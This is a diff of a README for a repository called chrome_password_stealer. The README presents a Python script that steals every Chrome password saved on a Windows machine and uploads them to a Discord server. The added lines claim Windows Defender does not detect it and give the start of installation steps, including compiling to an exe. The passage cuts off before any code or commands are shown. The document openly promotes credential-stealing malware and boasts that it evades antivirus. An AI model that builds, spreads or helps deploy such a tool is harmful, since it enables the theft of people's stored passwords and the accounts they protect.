lleeerrriiiccc/chrome_password_stealer/README.md

 # chrome_password_stealer
-This python script steals all the chrome password stored in a device and uploads them into a discord server
+This python script steals all the chrome password stored in a device and uploads them into a discord server.
+This program only works in windows and only for chrome.
+The windows defender doesn't detect it but maybe other programs can.
 ## instalation
 Download or clone the repository and eecute this command to install all dependencies, if you want to compile to a exe file you will need to install pyinstaller too.
 ```bash